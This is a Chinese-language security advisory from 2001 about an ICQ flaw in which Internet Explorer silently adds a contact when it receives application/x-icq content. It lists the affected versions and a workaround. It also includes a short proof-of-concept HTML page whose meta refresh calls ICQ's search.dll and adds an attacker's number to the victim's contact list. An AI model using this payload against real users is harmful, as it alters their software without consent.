安全研究
安全漏洞
ICQ 自动增加用户漏洞
发布日期:2001-08-23
更新日期:2001-08-24
受影响系统:
ICQ 2000*
ICQ 2001a Alpha
- Microsoft Windows 98
- Microsoft Windows NT
- Microsoft Windows 2000
描述:
ICQ 是一个流行的免费聊天工具。当ICQ安装时,它会在IE中增加一个"Content-Type"
:"application/x-icq"。
当IE从某个web服务器上收到"Content-Type: application/x-icq" 类型且包含如下内容
[ICQ User]
UIN=<uin>
Email=
NickName=
FirstName=
LastName=
* <uin>就是一个ICQ号码
的数据时,它会自动下载上述数据屏使ICQ将uin增加到它的联系列表中。
<*来源:AreS (
ares@security-downloads.com)
链接:
http://t-Omicr0n.hexyn.be/Hexyn-sa-22.txt
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
攻击者可以利用ICQ web服务器上的search.dll来进行攻击。攻击者可以构造下列HTML代码:
<HTML>
<META HTTP-EQUIV="REFRESH" CONTENT="0;URL=http://wwp.icq.com/scripts/search.dll?to=<uin>">
</HTML>
如果被攻击的用户使用IE打开上述代码,<uin>号码就会被自动增加到他的ICQ联系名单中。
建议:
临时解决方法:
在IE中删除"Content-Type: application/x-icq"或者使用其他的浏览器。
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.icq.com/
浏览次数:4280
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |